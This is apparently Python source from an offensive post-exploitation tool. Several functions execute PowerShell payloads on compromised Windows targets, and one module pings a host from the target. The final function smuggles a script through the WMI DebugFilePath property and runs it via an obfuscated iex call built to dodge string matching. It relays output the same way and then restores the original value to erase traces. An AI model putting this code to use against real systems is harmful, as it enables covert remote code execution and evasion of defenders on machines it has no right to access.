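def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False):
    """Run a PowerShell payload on the target, inline or one command per line from a local file.

    Args:
        payload: A PowerShell command string, or the path of a local file holding one
            command per line. Falls back to ``self.args.ps_execute`` when empty.
        get_output: Whether ``self.execute`` should collect output. Forced to ``True``
            unless ``self.args.no_output`` is set.
        methods: Execution methods handed straight through to ``self.execute``.
        force_ps32: Handed through to ``create_ps_command``.
        dont_obfs: Handed through to ``create_ps_command``.

    Returns:
        Always ``''``; any output is dealt with inside ``self.execute``.

    Raises:
        ValueError: If no payload was supplied, directly or via ``self.args.ps_execute``.
    """
    if not payload and self.args.ps_execute:
        payload = self.args.ps_execute
    if not payload:
        # Without this guard os.path.isfile(None) below dies with an unhelpful TypeError.
        raise ValueError('ps_execute: no PowerShell payload given')
    if not self.args.no_output:
        get_output = True

    # NOTE: a payload string that happens to name an existing local file is read as a
    # command file rather than executed as a command.
    if os.path.isfile(payload):
        with open(payload) as commands:
            for line in commands:
                command = line.rstrip('\r\n')
                if not command.strip():
                    continue  # a blank line would cost a round trip to the target for nothing
                self.execute(create_ps_command(command, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
    else:
        self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
    return ''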
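def on_admin_login(self, context, connection):
    """Ping ``self.host`` from the compromised box and log whether it answered.

    Runs ``Test-Connection -quiet -count 1`` through PowerShell via
    ``connection.execute`` and reports the outcome on ``context.log``.
    """
    # self.host is interpolated unquoted into a PowerShell command line. It comes from
    # the operator's target specification here; do not feed it from untrusted input.
    command = 'Test-Connection {} -quiet -count 1'.format(self.host)
    ps_command = create_ps_command(command)
    output = connection.execute(ps_command, get_output=True)
    if isinstance(output, bytes):
        output = output.decode('utf-8', 'replace')
    # Test-Connection -Quiet yields a [bool], which arrives as the text "True" or "False".
    # Only checking that *some* text came back would treat the string "False" as a hit,
    # so compare against the actual value.
    reachable = bool(output) and output.strip().lower() == 'true'
    if reachable:
        context.log.success('Pinged successfully')
    else:
        context.log.error('Host unreachable')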
def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False):
    """Wrap ``payload`` in a PowerShell launcher and hand it to ``self.execute``.

    Args:
        payload: The PowerShell to run; ``self.args.ps_execute`` is used when this is empty.
        get_output: Whether to collect output. Overridden to ``True`` unless
            ``self.args.no_output`` is set.
        methods: Execution methods passed through to ``self.execute``.
        force_ps32: Passed through to ``create_ps_command``.
        dont_obfs: Passed through to ``create_ps_command``.

    Returns:
        Whatever ``self.execute`` returns.
    """
    if not payload:
        fallback = self.args.ps_execute
        if fallback:
            payload = fallback
    want_output = True if not self.args.no_output else get_output
    ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs)
    return self.execute(ps_command, want_output, methods)
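def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False, timeout=None):
    """Run the module's PowerShell script on the target, relaying script and output over WMI.

    The ``DebugFilePath`` property of ``Win32_OSRecoveryConfiguration`` is used as a
    two-way mailbox: the script is stored there as comma-separated character codes,
    a small PowerShell stub on the target decodes and runs it, and the captured output
    is written back into the same property in the same encoding. The original value
    is saved first and restored when done.

    Args:
        payload: Handed to ``self.degen_ps_iex_cradle`` to build the command that runs
            the decoded script.
        get_output: Unused here; output always comes back through WMI.
        methods: Unused here.
        force_ps32: Unused here; the stub is always created with ``force_ps32=False``.
        dont_obfs: Unused here; the stub is always created with ``dont_obfs=False``.
        timeout: Seconds to wait for the target to replace the script with its output.
            ``None`` (the default) keeps polling forever, as before.

    Raises:
        RuntimeError: If ``timeout`` is set and the output never shows up in time.
    """
    wmi_query = 'Select DebugFilePath From Win32_OSRecoveryConfiguration'

    def _read_debug_file_path():
        # Single point for reading the property; both the script and its output live there.
        return self.get_values(self.query(wmi_query, self.namespace, printable=False))['DebugFilePath']

    script_command = self.degen_ps_iex_cradle(payload)
    # TODO: handle modules that ship more than one PS script (ps_script1, ps_script2, ...).
    encoded_script = ','.join(str(ord(ch)) for ch in self.module.ps_script)
    len_enc_script = len(encoded_script)

    # Keep the original so it can be put back: leaving the encoded script behind is an
    # obvious artifact for defenders and clobbers whatever the property normally holds.
    self.backup_value = _read_debug_file_path()
    self.update(update_value=encoded_script)

    # Target-side stub: pull the char codes out of DebugFilePath, rebuild the script and
    # feed it to iex (spelled as char codes 105,101,120 to dodge naive string matching),
    # run the cradle, then write the output back in the same encoding.
    decode_script_command = '''
    $a = Get-WMIObject -Class Win32_OSRecoveryConfiguration;
    $a = [char[]][int[]]$a.DebugFilePath.Split(',') -Join '';
    $a | .(-Join[char[]]@(105,101,120));$output = ({script_command} | Out-String).Trim();
    $EncodedText = [Int[]][Char[]]$output -Join ',';
    $a = Get-WMIObject -Class Win32_OSRecoveryConfiguration;
    $a.DebugFilePath = $EncodedText;
    $a.Put()
    '''.format(script_command=script_command)
    ps_comm = create_ps_command(decode_script_command, force_ps32=False, dont_obfs=False)

    output = ''
    try:
        self.execute(ps_comm)
        # The script is considered finished once the stored value's length no longer
        # matches the encoded script. NOTE: output that encodes to exactly the same
        # length is indistinguishable from "still running" (pre-existing limitation).
        deadline = None if timeout is None else time.time() + timeout
        while True:
            exec_result = _read_debug_file_path()
            if len(exec_result) != len_enc_script:
                break
            if deadline is not None and time.time() >= deadline:
                raise RuntimeError('timed out waiting for script output in DebugFilePath')
            time.sleep(1)
        # An empty property means the script produced no output (or it was cleared);
        # int('') on the old code path raised ValueError here.
        encoded_output = exec_result.strip()
        if encoded_output:
            output = ''.join(chr(int(code)) for code in encoded_output.split(','))
    finally:
        # Restore the original value even when execution or polling failed, so the
        # target is not left with our script sitting in its WMI configuration.
        self.update(update_value=self.backup_value)

    context = self.module_logger(self.module)
    self.send_fake_response(output, self.module, self.host, context)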